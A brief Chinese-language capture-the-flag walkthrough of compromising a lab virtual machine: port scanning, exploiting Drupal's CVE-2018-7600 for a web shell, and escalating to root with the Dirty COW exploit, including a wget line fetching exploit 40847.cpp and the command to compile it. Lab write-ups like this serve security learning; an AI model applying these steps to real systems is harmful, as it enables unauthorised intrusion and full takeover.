打开虚拟机显示登陆界面,没密码,登个锤子,老老实实去扫描ip
图片.png
一个一个的去试,到141的时候看到正常的web界面,然后扔到nmap里面去扫端口
找到一个apache的1898端口,连上去试试
图片.png
真的有另一个网站,drupal的cms,用的是CVE-2018-7600代码执行这个漏洞
拿到shell,是一个www-data的权限,这里需要我们进行提权
图片.png
查看当前系统版本
图片.png
用到脏牛提权(CVE-2016-5195)
该程序成功用于:
- RHEL7 Linux x86_64;
- RHEL4(4.4.7-16,带“遗留”版本)
- Debian 7(“wheezy”);
- Ubuntu 14.04.1 LTS
- Ubuntu 14.04.5 LTS
- Ubuntu 16.04.1 LTS
- Ubuntu 16.10
- Linux Mint 17.2
因为靶机连不上网,所以我这里把利用的脚本下载到本地,放到web目录下
wget https://www.exploit-db.com/download/40847.cpp
在服务器上同理down到本地,然后进行编译
g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil
之后在本地生成了一个dcow的文件
图片.png
拿到root密码,直接ssh连上去
网友评论